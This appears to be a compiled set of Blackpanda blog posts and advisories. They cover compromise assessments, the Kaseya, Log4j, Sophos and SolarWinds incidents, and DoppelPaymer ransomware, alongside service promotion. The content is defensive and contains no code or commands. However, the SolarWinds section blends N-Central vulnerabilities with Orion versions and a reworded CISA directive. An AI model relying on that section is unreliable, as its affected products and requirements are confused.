SMEs tend to view cyber security as a low priority item on their checklist, seeing it as an all-or-nothing matter. Most bigger firms and institutions are likely to have an in-house cyber team. However, the recent rise in attacks against both SMEs and big firms have highlighted how important it is for organizations to build cyber resiliency irrespective of size. Preventing cyber breaches and developing a well-prepared cyber strategy can save Start-Ups and SMEs millions of dollars by avoiding strict cyber breach penalties that are in place to punish negligence.
Without a strong cyber security posture and an incident response plan in place, one cyber compromise to a SME can be the difference between business as usual and shutting down for good. Ensuring that the company is doing all that it can to protect itself from cyber breaches is crucial in an evolving cyber threat landscape where neglecting ‘the last mile’ can have unforgiving consequences. The good news is, cyber security services can come at a much smaller cost compared to having an in-house SOC team, and there are cyber security services providers like Blackpanda that can help.
Whilst a strong digital infrastructure and good cyber hygiene can protect organizations from up to 90% of cyber risks, they are not sufficient. Attackers are continuously working to find loopholes in the system, and a singular instance of negligence can severely compromise the cyber security of the company. Thus, having a trusted cyber Incident Response partner that can support your organization in covering the last mile of cyber risk is invaluable.
Blackpanda provides bespoke Digital Forensics and Incident Response services to SMEs in the APAC region, with a hyper-focused approach informed by our Special Forces background. SMEs can take cyber security seriously too, and there are options for all business types and sizes
Blackpanda is Asia’s premier Digital Forensics and Incident Response provider. By contacting us before you are breached, we will be able to help you strengthen your security posture, and we will be promptly available when you fall victim to a cyber attack.
Businesses regularly conduct cyber security assessments for a number of reasons, including government and regulatory requirements, corporate compliance audits, or as part of their own responsible data protection policies. However, when it comes to choosing a particular assessment approach, decision makers may be unaware of the differences and advantages between two of the most commonly employed cyber security assessments.
To that end, this article covers the fundamentals of Vulnerability Assessment & Penetration Testing and Compromise Assessments. Both approaches will be compared, and readers will walk away with a better understanding of which evaluation is better suited for their needs.
What is vulnerability assessment and penetration testing (VAPT)?
Vulnerability Assessment & Penetration Testing (VAPT), also known as “penetration testing”, “pen testing”, and “red teaming”, is a preventive exercise aimed at discovering an organization’s cyber security weaknesses and patching them before an attack takes place.
VAPT follows an “outside–in” approach, looking at the company’s systems from an attacker’s perspective, mimicking the actions an attacker might take when approaching the company’s network. The goal of VAPT is to find any security bugs or misconfigurations within a software program or a computer network and highlight where the organization needs to focus its cyber security hardening efforts from a defense structure perspective.
While VAPT is often referred to as a single exercise, the process actually requires two separate phases: “Vulnerability Assessment” (VA) and “Penetration Testing” (PT). Vulnerability Assessments first search for any “open doors” or vulnerabilities that attackers may exploit to penetrate the system. Penetration Testing is then performed by human-led “Red Teams” (or offensive ethical hackers) who use real-world adversary tradecraft and security gaps found in the Vulnerability Assessment phase to attempt to enter the system (whether both “VA” and “PT” are offered in conjunction or as separate services depends on the provider).
VAPT ultimately supports the overall goal of improving an organization’s cyber security by identifying security infrastructure holes to be remediated.
The limitations of VAPT
Whilst VAPT is very good at assessing system defenses, its outside–in approach does not account for any malicious activity already occurring within an environment. In other words, VAPT does not produce any information about what is actually happening within the organization’s systems. For example, VAPT would neither prevent nor detect unauthorized access using stolen but legitimate credentials (such as through a phishing attack, which is the avenue of approach for 95% of all cyber attacks today, according to the SANS Institute).
Additionally, penetration teams are often banned from touching production systems, as this may compromise sensitive information or impact operations. Thus, such systems remain out of the scope of the test and the true havoc an attacker may wreak on a system is not fully assessed. Only through a Compromise Assessment can all the exploited vulnerabilities be caught and patched.
Given the speed at which attacks can spread from one infected endpoint to all network endpoints, early detection of an active intrusion can make the difference between surviving an attack and shutting down operations due to extensive damage. As such, companies may prefer to prioritize regularly scheduled Compromise Assessments as a means of detecting active threats and already-exploited infrastructure gaps — not just theoretical ones.
The benefits of an inside-out approach via compromise assessment
A Compromise Assessment is essentially what an Incident Response firm would do in the event of a breach: an inside–out investigation and security audit of the organization’s internal environment, applications, infrastructures, and endpoints.
Today, as attackers and their methodologies outstrip the abilities of cyber defense, preventative products and services often fail in stopping breaches. Conducting a Compromise Assessment is akin to defaulting to the last resort in a proactive manner, essentially undertaking the correct assumption that even the most sophisticated cybersecurity defenses cannot guarantee safety. This philosophy is called “Assumed Breach”, which is growing as a common framework to view cyber security due to the explosion of attacks as the adversaries scale their technologies and tactics at an alarming rate since the start of COVID.
With phishing-led attacks on the rise, and 78% of organizations in APAC planning to maintain at least some of the “Work From Home” (WFH) arrangements set out during the COVID-19 outbreak - meaning people are working in environments where endpoints are scattered across different networks - Compromise Assessments should be carried out with higher frequency to ensure the systems are safe from within. Compromise Assessments look at the system from the inside, searching for malware that has attempted or successfully compromised the network to provide insights on which vulnerabilities are being exploited. Results are based on suspicious user behaviors, extensive log review, Indicators of Compromise (IOCs), and any other evidence of malicious activities to identify attackers residing in the current environment (or active in the past).
This is why global financial institutions have internal teams, just like Blackpanda’s, conducting Compromise Assessments on a daily basis, as their risk tolerance for being unaware of an active breach is essentially nil. For smaller companies which can assume a higher risk tolerance, Compromise Assessments can be conducted weekly, monthly, or even quarterly -- the decision regarding frequency ultimately being a financial cost-benefit analysis for each business. Blackpanda recommends a minimum of quarterly Compromise Assessments in Asia due to the average dwell time, or the amount of time for a victim to detect an active intrusion, is slightly above 90 days. Conducting Compromise Assessments on a quarterly basis would enable victims to preemptively detect an active breach prior to accidentally discovering it in a normal dwell time scenario, thus resulting in a reduction of the damage otherwise to be inflicted.
Carrying out Compromise Assessments through an Incident Response specialist firm like Blackpanda has great advantages when it comes to identifying breaches and backdoors early and kicking them out before they can cause severe financial damage. This way, as soon as an attack is identified during a Compromise Assessment, Blackpanda can immediately begin Incident Response to contain and eradicate the threat. Eliminating threats early and often is key to safeguarding an organization’s cyber health and overall survival, as the dwell time of a cyber attack, or the amount of time to detect an active intrusion, is one of the most important factors in determining the severity of a breach. Catching a fire while it is still a small flame is better than allowing the spark to turn into a raging inferno before noticing it and attempting to address it. Similarly, conducting frequent Compromise Assessments to catch attackers in early-stage, and then transitioning immediately into Incident Response to stamp them out can significantly limit breach damage.
Recurring Compromise Assessments thus serve as both a preventive and proactive defensive tool, offering a real-time view of an organization’s security posture and the opportunity to promptly respond to any attack before further damage can be done.
Conclusion
Preventive VAPT is important, but outside–in assessments alone can only discover vulnerabilities without verifying whether a system has already been breached. Compromise Assessments offer a more holistic alternative, as they help single out bugs and vulnerabilities in the network, identify opportunities for improvement, and produce information about whether the company is already under attack.
Thanks to their inside-out approach, Compromise Assessments further support Incident Response efforts, helping reduce dwell time by enabling prompt activation of response plans and processes.
Blackpanda security specialists operate both on-site and remotely to conduct Compromise Assessments and evaluate the security risk of organizations by assessing critical assets, networks, and logs through its proprietary forensics tool, Pandarecon.
To learn more about how proactive cyber security forensics audits can improve your organization’s security posture and fulfill compliance requirements, contact Blackpanda today.
On Friday, July 2, 2021, before the American Fourth of July long weekend, affiliates of the REvil RaaS (Ransomware-as-a-Service) threat actors executed a supply-chain attack through Kaseya’s remote IT management software, specifically affecting its Virtual System Administrator (VSA).
Kaseya, a software platform designed to help manage IT services remotely, and its affiliated partner researchers, were aware of the exploit and were working on a patch when the REvil ransomware was launched. In a sprint between threat actors and security experts, the bad guys won out before a patch could be implemented.
The attack affected hundreds and likely thousands of businesses globally with the REvil ransomware demanding USD 70 Million in Bitcoin to restore the encrypted data being held captive.
The timing was not coincidental as major cyber attacks similar to this one are carefully coordinated to commence around major holidays with threat actors anticipating slower response times and a generally sparse IT staff during the attack.
Kaseya released a statement noting that they immediately disconnected their servers and have maintained communication with all of their 36,000+ clients about the incident. Their actions allowed them to contain their breach to less than 60 clients; however, of those that were affected, more than 30 were MSPs which in turn have thousands of their own clients who could be affected.
Who was affected?
The far-reaching impacts of the attack are still being pieced together as thousands of companies globally were targeted. Some larger retailers like Swedish Coop supermarkets needed to shut down hundreds of stores as their checkout cash register system was taken offline.
CISA and the FBI have released Guidance for MSPs and their customers affected by the Kaseya VSA Supply-Chain Ransomware Attack and encouraged all affected organisations to "follow Kaseya's guidance to shut down VSA servers immediately." Kaseya has also been posting regular updates as to their diligent resolution of this vicious attack.
The Kaseya ransomware attack further highlights the vulnerabilities and potentially catastrophic disruptions that all organisations can be susceptible to, with cyber threat actors growing bolder and more sophisticated at an immeasurable pace. With the increasing level of danger in the cyber world, it’s more important than ever to solidify your organisation’s posture and preparedness against the rising cyber threat.
What can be done to protect your organisation from future cyber threats?
The best time to create an Incident Response Plan to combat a cyber attack is before an attack occurs. To that end, Blackpanda recommends a regular Compromise Assessment that sweeps your internal network and endpoints to ensure it is free of threat actors, signs of compromise, and malware. To find out more about Blackpanda Compromise Assessments, reach out to us via our website or email us at hello@blackpanda.com.
IR1: The most effective cyber risk management solution for SMEs in Asia
Waiting for an attack to happen before you contact a cyber incident response team can cost precious time and a high hourly fee, which is why pre-purchasing a retained solution is the best way to optimise response time and minimise costs.
Blackpanda’s IR-1 subscription is the most effective solution for small and medium enterprises in Asia Pacific facing limited resources and knowledge in managing cyber breaches. IR-1 aims to help them manage cyber breaches and mitigate their impact by offering a 12-month subscription plan that includes 24/7 incident response availability, one incident response activation credit, discounted rates for Blackpanda services, and unlimited access to a digital library. IR-1 is staffed by highly trained specialists, and businesses can renew the subscription upon expiry.
A remote code execution (RCE) vulnerability (CVE-2022-1040) has been identified in User Portal and Webadmin of Sophos Firewall in versions 18.5 MR3 (18.5.3) and older. The vulnerability has been rated as critical by our cyber security specialists.
Sophos Firewall software provides network and user endpoint security.
The exploitation of an RCE vulnerability could allow a malicious actor to remotely install malware or otherwise control the affected device.
Sophos has observed this vulnerability being used to target a small set of specific organisations primarily in the South Asia region. We have informed each of these organisations directly. Sophos will provide further details as we continue to investigate.
How to stay secure
Organisations who use Sophos Firewall versions prior to v18.5 should review their patch status and update to the latest version.
Sophos Firewall has released a security advisory and hotfix for the affected Firewall versions. Please review the hotfix, and implement it as soon as possible.
There is no update action required for Sophos Firewall customers with the "Allow automatic installation of hotfixes" feature enabled. Enabled is the default setting. To confirm that the hotfix has been applied to your firewall, please refer to KB-000043853.
What to do if you believe you may be affected by this vulnerability
Blackpanda incident response experts are monitoring the situation and are prepared to provide assistance and advice as required.
If you believe that your organisation may have been impacted by this vulnerability, a compromise assessment is the best way to ensure that any threats currently in your network are addressed as soon as possible.
The Log4j vulnerability has taken the world by storm and internal IT security teams have been caught off guard by the sheer magnitude of this threat to company systems. This “zero-day” remote code execution vulnerability allows attackers to run brute force attacks on vulnerable applications and remotely run malicious code without authentication. This could include malware such as cryptominers and ransomware.
Cyber security intelligence providers, Check Point, have observed 800,000 exploitation attempts in the first 72 hours since the detection of this issue. This means that the time to take action is now, as threat actors continue to make strides in understanding this vulnerability and how they might be able to leverage it for their goals.
In Asia, the situation is no different. Over the past two weeks, Blackpanda has seen a spike in inbound cases, many of which cite Log4j as the principal cause of concern. While incident response services can and should be sought out following a breach, taking pre-emptive steps to ensure your systems safety is a more cost-effective and defensive measure to avoid falling victim to a reactive scenario.
As a first plan of attack for addressing the Log4j vulnerability, our security experts recommend the following three steps:
1. Apply the latest security patches § § § § Follow the guidance from Apache to apply their latest security update (2.15.0 at the time of writing). Once patched, it is recommended that all users change their passwords. This is also a good time to enable multi-factor authentication if you have not already done so. In the event that you are unable to apply the latest patch, please follow the following recommended mitigation measures located at https://logging.apache.org/log4j/2.x/security.html
2. Scan for signs of compromise Have a suitably qualified member of your IT team or external IT vendor search for any unauthorised code running or potential unauthorised access to systems.
3. Backup data and store offline It is sensible practice to regularly backup data and store offline. Now is a sensible time to validate your own backup process and ensure that you have done so recently and will continue to do so regularly.
Should your team not have the capabilities to perform an internal audit or are seeking the support of seasoned incident response experts, Blackpanda also offers holistic compromise assessment services.
Compromise Assessments
Compromise assessments seek to find attackers who are currently taking a foothold in an environment or that have been active in the recent past. In a similar way to the actions Blackpanda IR specialists take in the event of a breach, compromise assessments are an inside–out investigation and security audit of an organization’s internal environment, applications, infrastructures, and endpoints. In aid of the growing concern regarding the Log4j vulnerability, Blackpanda compromise assessments offer companies peace of mind by checking every possible point of entry while specifically targeting Java related applications and use cases to certify the safety of an internal network. With threat actors leveraging the Log4j exploit at an alarming pace, the question companies need to be asking themselves should no longer be “Can I be hacked?”, but instead “Have I been hacked?”.
This is an extremely urgent matter and Blackpanda strongly advises organizations to take appropriate steps to protect their network immediately. If you have any questions or concerns related to this advisory, or are seeking immediate assistance responding to a cyber incident, please reach out directly to hello@blackpanda.com.
Multiple Vulnerabilities in SolarWinds N-Central Could Allow for Remote Code Execution
This response guide has been developed by Blackpanda following the SolarWinds attack 11 December 2020.
The guide largely follows advice published in CISA Emergency Directive 21-01 (https://cyber.dhs.gov/ed/21-01/) and Multi-State Information Sharing and Analysis Center (MS-ISAC) Advisory 2020-170 (issued December 18, 2020), and subsequent supplemental updates.
Background
SolarWinds Orion products (affected versions below) are currently being exploited by malicious actors. This tactic permits an attacker to gain access to network traffic management systems. Disconnecting affected devices, as described in Required Action 2, is the only known mitigation measure currently available.
CISA has determined that this exploitation of SolarWinds products poses an unacceptable risk and requires emergency action. This determination is based on:
Current exploitation of affected products and their widespread use to monitor traffic on computer network systems;
High potential for a compromise of information systems;
Grave impact of a successful compromise.
CISA understands that the vendor is working to provide updated software patches. However, companies must wait until CISA provides further guidance before using any forthcoming patches to reinstall the SolarWinds Orion software in their enterprise. Please refer to the MITRE ATT&CK framework for possible tactics the threat actors are using to maintain persistence in the environment.
Systems Affected
SolarWinds N-Central Platform version 12.3 HF4. The following versions are considered affected versions:
Orion Platform 2019.4 HF5, version 2019.4.5200.9083
Orion Platform 2020.2 RC1, version 2020.2.100.12219
Orion Platform 2020.2 RC2, version 2020.2.5200.12394
Orion Platform 2020.2, 2020.2 HF1, version 2020.2.5300.12432
Technical Summary
Multiple vulnerabilities have been discovered in SolarWinds N-Central, two of which could allow for remote code execution when used in conjunction. Details of these vulnerabilities are as follows:
An OS command-injection vulnerability due to traversal issue (CVE-2020-25617), can be used together with CVE-2020-25622 as a one-click root RCE attack chain
A local privilege escalation vulnerability (CVE-2020-25618)
An unauthorized access vulnerability due to built-in support and admin accounts with default credentials (CVE-2020-25620)
An unauthorized access vulnerability due to an authentication mechanism in the local Postgres database (CVE-2020-25621)
A CSRF vulnerability in N-Central Admin Console (CVE-2020-25622), can be used in conjunction with CVE-2020-25617 for a one-click root RCE attack chain
Successful exploitation of the most severe of these vulnerabilities could allow for remote code execution. Depending on the privileges associated with the user, an attacker could install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.
Recommendations Overview
We recommend the following actions be taken:
Apply appropriate updates provided by SolarWinds to vulnerable systems, immediately after appropriate testing
Run all software as a non-privileged user (one without administrative privileges) to diminish the effects of a successful attack
Remind users not to visit untrusted websites or follow links provided by unknown or untrusted sources
Inform and educate users regarding the threats posed by hypertext links contained in emails or attachments especially from an untrusted source
Apply the Principle of Least Privilege to all systems and services
Detailed Remediation
This emergency directive requires the following actions:
1. Companies that have the expertise to take the following actions immediately must do so before proceeding to Action 2. Companies without this capability shall proceed to Action 2.
a. Forensically image system memory and/or host operating systems hosting all instances of SolarWinds Orion versions 2019.4 through 2020.2.1 HF1]. Analyze for new user or service accounts, privileged or otherwise.
b. Analyze stored network traffic for indications of compromise, including new external DNS domains to which a small number of agency hosts (e.g., SolarWinds systems) have had connections.
2. Affected Companies shall immediately disconnect or power down SolarWinds Orion products, versions 2019.4 through 2020.2.1 HF1, from their network. These versions are considered unsafe and should not be used going forward. All other versions from 2020.2 HF2 onwards can be used, if the instance did not previously use an affected version, but still will need to be updated immediately.
Additionally:
a. Block all traffic to and from hosts, external to the enterprise, where any version of SolarWinds Orion software has been installed.
b. Identify and remove all threat actor-controlled accounts and identified
persistence mechanisms.
3. By 12pm Eastern Standard Time on Monday December 14, 2020 companies shall report as an incident to CISA (at https://us-cert.cisa.gov/report) the existence of any of the following:
a. [SolarWinds.Orion.Core.BusinessLayer.dll] with a file hash of [b91ce2fa41029f6955bff20079468448]
b. [C:\WINDOWS\SysWOW64\netsetupsvc.dll]
c. Other indicators related to this issue to be shared by CISA
4. After (and only after) all threat actor-controlled accounts and identified persistence mechanisms have been removed:
a. Treat all hosts monitored by the SolarWinds Orion monitoring software as compromised by threat actors and assume that further persistence mechanisms have been deployed.
b. Rebuild hosts monitored by the SolarWinds Orion monitoring software using trusted sources.
c. Reset all credentials used by or stored in SolarWinds software. Such credentials should be considered compromised.
d. Take actions to remediate kerberoasting, including, as necessary or appropriate, engaging with a 3rd party with experience eradicating APTs from enterprise networks. For Windows environments, refer to the following:
•Require use of long and complex passwords (greater than 25 characters) for service principal accounts and implement a good rotation policy for these passwords.
•Replace the user account by Group Managed Service Account (gMSA). See https://docs.microsoft.com/en-us/windows-server/security/group-managed-service-accounts/group-managed-service-accounts-overview and Implement Group Managed Service Accounts: https://docs.microsoft.com/en-us/windows-server/security/group-managed-service-accounts/group-managed-service-accounts-overview.
•Set account options for service accounts to support AES256_CTS_HMAC_SHA1_96 and not support DES, RC4, or AES128 bit encryption
•Define the Security Policy setting, for Network Security: Configure encryption types allowed for Kerberos. Set the allowable encryption types to AES256_HMAC_SHA1 and Future encryption types. https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-configure-encryption-types-allowed-for-kerberos
•See Microsoft’s documentation on how to reset the Kerberos Ticket Granting Ticket password, twice: https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password
5. By 12pm Eastern Standard Time on Monday, December 14, 2020, submit a report to CISA using the provided template. Department-level Chief Information Officers (CIOs) or equivalents must submit completion reports attesting to CISA that the affected devices were either disconnected or powered down.
Companies that were using affected versions at any time prior to the issuance of ED 21-01 must:
Keep these products disconnected as required by ED 21-01 pending further CISA guidance and not rebuild or reimage the affected platforms and host operating systems (OS), including (re)joining the host OS to the enterprise domain, until such time as CISA directs otherwise.
Label and isolate all backups of the affected versions from their systems to prevent accidental re-introduction of malicious code to the production environment.
Conduct forensic analysis or search, as appropriate based on capability, for indicators of compromise (IOCs) or other evidence of threat actor activity. a. Companies running affected versions that have no capability to conduct forensic analysis (system memory, host storage, network) shall, at minimum, search for IOCs or other evidence of threat actor activity published in ED 21-01, Activity Alert AA20-352A, and future associated guidance. b. Companies that find matches to these IOCs or evidence of threat actor activity through forensics analysis must report this as an incident to CISA through https://us-cert.cisa.gov/report. If a reporting agency already submitted incident information to CISA, please send updates to CISA as you discover new evidence. ac. Companies running affected versions that have no capability to conduct forensic analysis and no capability to search for IOCs shall assume breach, report the incident to CISA through https://us-cert.cisa.gov/report, and contact central@cisa.dhs.gov to coordinate finding a qualified service provider capable of conducting forensics.
Federal Information Systems Hosted in Third-Party Environments (such as Cloud)
CISA is working closely with FedRAMP to coordinate the response to ED 21-01 with FedRAMP Authorized cloud service providers (CSPs). FedRAMP Authorized CSPs have been informed to coordinate with their agency customers.
1. If FedRAMP Authorized CSPs are affected, their agency customers must report incidents to CISA in accordance with ED 21-01. Companies hosting information in any third-party environment (FedRAMP Authorized or otherwise) must identify and contact their third-party service providers directly for status pertaining to, and to ensure compliance with, ED 21-01.
2. Companies are also instructed to supplement their reporting under ED 21-01 to incorporate relevant information from third-party service providers (to the extent that Companies have not already included this information), including to report any incident through CISA. In your incident reporting, please identify what data was exposed to the third-party service provider.
Conditions for Reconnecting Unaffected Versions
At this time, CISA is still assessing whether it is appropriate to relax ED 21-01’s requirement that Companies not install patches for their SolarWinds Orion software. Some older versions of SolarWinds Orion have been identified as not affected by the malicious backdoor. However, operating such older versions carries significant risk, because (1) like other types of older software, older versions of SolarWinds Orion contain known vulnerabilities; (2) the adversary that inserted the SolarWinds Orion backdoor is likely to be intimately familiar with SolarWinds Orion code, including known or unknown vulnerabilities that may exist separate and apart from the backdoor; and (3) this adversary has demonstrated the capability and willingness to exploit SolarWinds Orion to compromise U.S. government Companies, critical infrastructure entities, and private organizations.
Companies are permitted to power back up and reintroduce into an agency production environment SolarWinds Orion instances that were disconnected pursuant to ED 21-01 only if each of the following conditions are met:
1. The instance currently uses an unaffected version of the SolarWinds Orion, which are listed below.
a. Orion Platform 2019.4 2019.4.5200.8890
b. Orion Platform 2019.4 HF1 2019.4.5200.8950
c. Orion Platform 2019.4 HF2 2019.4.5200.8996
d. Orion Platform 2019.4 HF3 2019.4.5200.9001
e. Orion Platform 2019.4 HF4 2019.4.5200.9045
2. The instance did not previously use an affected version (i.e., the instance was never rolled back from an affected version) and the instance is not restored from an affected version.
3. The agency first (1) hunts for threat actors in their environment using all IOCs and indicators of threat actor activity published about this threat activity in ED 21-01, Activity Alert AA20-352A, and any additional related guidance related to this activity published by CISA or provided by the information security community prior to the instance being reintroduced to the environment, and (2) finds no evidence of such threat actor activity.
4. The agency conducts a risk assessment to assess the impact of reintroducing the Orion Platform into agency production environments and accepts residual risk associated with running this unpatched software containing known vulnerabilities until such time as CISA permits companies to patch these products.
5. Block all incoming and outgoing (any:any) Internet traffic to and from hosts running SolarWinds Orion products (as required by ED 21-01).
6. Follow the SolarWinds hardening guidelines provided by the vendor, which can be found at: https://documentation.solarwinds.com/en/Success_Center/orionplatform/content/core-secure-configuration.htm
EXCEPT:
a. Companies shall not configure the SolarWinds software to implement SAML-based authentication that relies on Microsoft’s Active Directory Federated Services. This configuration is currently being exploited by the threat actor associated with this activity.
b. Companies shall not follow the hardening guideline’s requirement to ensure their SolarWinds instance is patched to the latest version, pending further direction from CISA to do so.
7. Ensure that the SolarWinds logs are being sent to the agency SOC for action.
Other Versions
Companies continuing to run instances of SolarWinds Orion with other versions must comply with steps 5-7 listed for unaffected versions.
Companies may apply updates to host operating system running SolarWinds Orion products in accordance with their respective vulnerability and patch management policies and programs.
All other provisions specified in ED 21-01 remain in effect.
Blackpanda is proud to be partnering with DarkOwl to provide darknet scans as a part of all incident response and compromise assessment services to our clients.
Blackpanda addresses cyber attacks from all varieties of malware, ransomware or business email compromise. Stationed in cities across the Asia-Pacific region, we have a hyper focus on digital forensics and incident response.
The incident response lifecycle
Incident response starts with a call, an alert, or an automated indicator that comes from one of our intelligent platforms or an endpoint detection and response tool.
Once we receive such an alert, we then move on to determine the validity and extent of the attack. Essentially, incident responders scope out what happened and assess what resources we need to deploy in order to address the attack.
After this, the triage process starts. Our digital forensics specialists gather evidence, with the goal of finding indicators of compromise. In the meantime, incident responders develop a plan of action and work with the client in order to stop the infection from spreading any further.
The containment phase follows, where incident responders actively block the malware and stop it from carrying out damage to the system.
All this happens within the first 48 hours following initial notification of an attack. By working around the clock, Blackpanda DFIR specialists are able to swiftly figure out who the threat actor is and have an idea of what assets and data could be at risk.
What data has been leaked?
After the malware has been eradicated, we typically hear the same question from our clients: ‘What data has been leaked?’
This is a very important thing to evaluate, as leaked data may contain sensitive information such as emails, passwords, or proprietary files. Hackers often post this information on darknet forums, effectively increasing the company’s vulnerability to a second attack.
Having access to DarkOwl’s darknet scanning tools at this point is extremely helpful. This way, we are able to actively and continuously monitor the darknet and look up darknet data from over 30,000 websites as part of the services we offer our clients.
What information is available on the darknet?
Among the types of data that are found in the darknet are very large quantities of personally identifiable information and credentials to compromised accounts which can be used by attackers to spread ransomware. Additionally, darknet forums host chatter amongst threat actors, which if identified, can help us predict which organizations they are likely to target next.
We can also find many vendor and supply risk indicators. Most recently, in the context of the Ukraine Russia war, we are finding significant indicators of risk among vendors, supply chain vendors and supply chains that have presence in Ukraine, Belarus and Russia.
With such access to darknet data, Blackpanda can then work on ‘connecting the dots' and delivering relevant intelligence to make informed predictions of the risks organizations face.
Working together to protect organizations in APAC from cyber attacks
Blackpanda is Asia’s premier ‘cyber firefighting’ firm, offering specialized digital forensics and incident response for organizations in the region.
By leveraging DarkOwl’s Vision platform, Blackpanda is able to offer darknet intelligence to clients and guide them in carrying out appropriate action to mitigate near and long term risks while informing their overall cyber security posture.
About Blackpanda
Blackpanda is Asia’s premier digital forensics and incident response firm, hyper-focused solely on digital forensics and cyber crisis response. Our team consists of an elite cadre of risk and security experts from international special forces, intelligence, forensics, and law enforcement backgrounds. We are highly trained, ready to respond to and help manage crises on short notice, when and wherever needed. To learn more, please visit www.blackpanda.com
About DarkOwl
We are darknet experts. DarkOwl was founded in 2016, and we are the world's leading provider of DARKINT™, darknet intelligence and offer the largest commercially available database of darknet content. DarkOwl enables cybersecurity organisations, law enforcement and government organisations to fully understand their security posture, detect potential breaches and violations of the law and mitigate them quickly. We offer a variety of options to access our data, please visit us at www.darkowl.com.
DoppelPaymer is a type of malicious software that infiltrates an endpoint through a link or download file, encrypts important files on the computer, and then spreads to other endpoints in the network. Attackers then send a message to the encrypted computers with instructions on how to pay the ransom amount—usually in the Bitcoin cryptocurrency—in order to restore the files. In DopplePaymer’s case, ransom demands for file decryption range anywhere from USD 25,000 to USD 1.2 million.
Additionally, in February 2020, the malicious actors behind DoppelPaymer launched a data leak site, threatening victims with the publication of their stolen files on the site as part of the ransomware’s extortion scheme. DoppelPaymer ransomware is among the most active threats right now, and companies should be aware of its risks and prepare for an attack by ensuring they have a clear incident response plan in place.
DoppelPaymer’s primary targets are organizations in the healthcare, emergency services, and education industries. The ransomware was involved in a number of high-profile attacks in 2020 and 2021, targeting community colleges, police, emergency services in the US, a German hospital, and Kia Motors, amongst others.
The Link Between DopplePaymer and BitPaymer
DoppelPaymer ransomware was first discovered in April 2019, and it is believed to be based on the BitPaymer ransomware, which first appeared in 2017. Since then, a link between the two ransomware variants has been established due to similarities in their code, ransom notes, and payment portals.
However, there are three key differences between DoppelPaymer and BitPaymer. For one, DoppelPaymer uses 2048-bit RSA + 256-bit AES for encryption, while BitPaymer uses 4096-bit RSA + 256-bit AES, with older versions using 1024-bit RSA + 128-bit RC4. DoppelPaymer also improves upon BitPaymer’s rate of encryption by using threaded file encryption, which allows for the encryption of entire endpoints within seconds.
The third key difference between the two viruses is that DoppelPaymer requires a specific command-line parameter in order to execute its malicious routines. This technique is possibly used by the attackers to avoid detection via sandbox analysis as well as to prevent security researchers from studying the samples.
Who is Behind DoppelPaymer?
DoppelPaymer has been attributed to the threat group known as Indrik Spider. But, who is Indrik Spider?
Indrik Spider was formed in 2014 by former affiliates of the GameOver Zeus criminal network. The group soon developed their own custom malware, known as Dridex. Whilst early versions of Dridex were primitive, over time, the malware became increasingly professional and sophisticated. Between 2015 and 2016, Dridex was one of the most prevalent malware families, primarily being used to conduct wire fraud. With the arrest of a member of the group came the setback of Indrik Spider’s operations.
In 2017, the group reappeared on the cyber crime landscape rebranded as Grief Group, in an effort to appear like a separate actor. Grief Group conducted smaller Dridex distribution campaigns, introducing BitPaymer ransomware—DoppelPaymer’s antecedent—and focused on leveraging access within a victim organization to demand high ransom payments. In 2019, DoppelPaymer appeared as a highly dangerous evolution of BitPaymer, targeting organizations worldwide. A famous case was the attack on Kia Motors in February 2021, where the ransom request amounted to USD 20 million.
How does DoppelPaymer Work?
DoppelPaymer uses a fairly sophisticated routine to gain access into a target network and conduct its activities. A typical attack starts with network infiltration via malicious spam emails containing spear phishing links or attachments. Such emails are especially designed to lure unsuspecting users into executing malicious code that is usually disguised as a genuine-looking document.
The code then downloads the Emotet Trojan into the victim’s system. The Trojan is specialized in evading detection from common antivirus programs. Emotet also communicates with its command-and-control (C&C) server to install various DoppelPaymer modules as well as to download and execute other tools, including PowerShell Empire, Cobalt Strike, Mimikatx, and PSExec. Each of these tools are used for specific activities, such as stealing credentials, moving laterally inside the network, and executing commands for disabling security software.
The malicious actors do not immediately deploy the ransomware upon initial access. Instead, they try to move laterally within the affected system’s network through Dridex, in search of high-value targets to steal critical information from. Once such a target is found, Dridex executes its final payload, DoppelPaymer. DoppelPaymer encrypts files found in the network as well as fixed and removable drives in the affected system.
As a final step, DoppelPaymer changes user passwords and forces a system restart into safe mode to prevent user entry. When a user tries to start an infected machine, DoppelPaymer’s ransom note appears on screen. The note warns users not to reset or shut down the system, as well as not to delete, rename, or move the encrypted files. The note also contains a threat that sensitive data will be shared with the public if they do not pay the ransom demanded from them.
How to prevent a DoppelPaymer attack?
Use this checklist to prevent a DoppelPaymer ransomware attack and prepare for a breach in order to be resilient to its impact.
PRE-BREACH PREP
Use an EDR Service
Prepare an Incident Response Plan and Team
Purchase a Cyber Insurance Policy
ACTIVE BREACH RESPONSE
Disconnect or Shut Down Computing Devices
Contact a Trusted IR Team
Document All Significant Events and Actions
POST-BREACH MANAGEMENT
Deploy EDR Services
Regularly Patch and Update
Ensure Effective Backups Exist
Tighten Security Configurations
Have a Plan and Team in Place for Future Breaches
Ongoing Cyber Awareness Training for Employees
Insure Against Future Cyber Losses
The DoppelPaymer ransomware strain is a relatively new and high-risk cyber threat. Being an evolved BitPaymer, it is able to encrypt entire networks within minutes from penetrating an endpoint. With large ransom demands and widespread targets, organizations in the APAC region should be on guard.
The best way to prepare for a ransomware attack is to ensure that you have a clear incident response plan in place. Falling victim to ransomware can be a stressful and emotional time, and an experienced incident response (IR) company such as Blackpanda provides invaluable help in containing the attack, eradicating the malware, and restoring business as usual, all whilst managing PR, negotiating with the attackers, and ensuring safety and legality throughout.
At Blackpanda, our experienced team of ransomware professionals guide organizations through the process of dealing with a ransomware attack, helping to minimize losses, recover encrypted data, as well as negotiate and facilitate ransom payment.
By contacting Blackpanda, we can support you in building up the resilience that your organization needs to survive a ransomware attack. Contact us today to learn more.
The best cyber incident response and risk management solution for small and medium businesses: IR-1
Waiting for an attack to happen before you contact a cyber incident response team can cost precious time and a high hourly fee, which is why pre-purchasing a retained solution is the best way to optimise response time and minimise costs.
Blackpanda’s IR-1 subscription is the most effective solution for small and medium enterprises in Asia Pacific facing limited resources and knowledge in managing cyber breaches. IR-1 aims to help them manage cyber breaches and mitigate their impact by offering a 12-month subscription plan that includes 24/7 incident response availability, one incident response activation credit, discounted rates for Blackpanda services, and unlimited access to a digital library. IR-1 is staffed by highly trained specialists, and businesses can renew the subscription upon expiry.
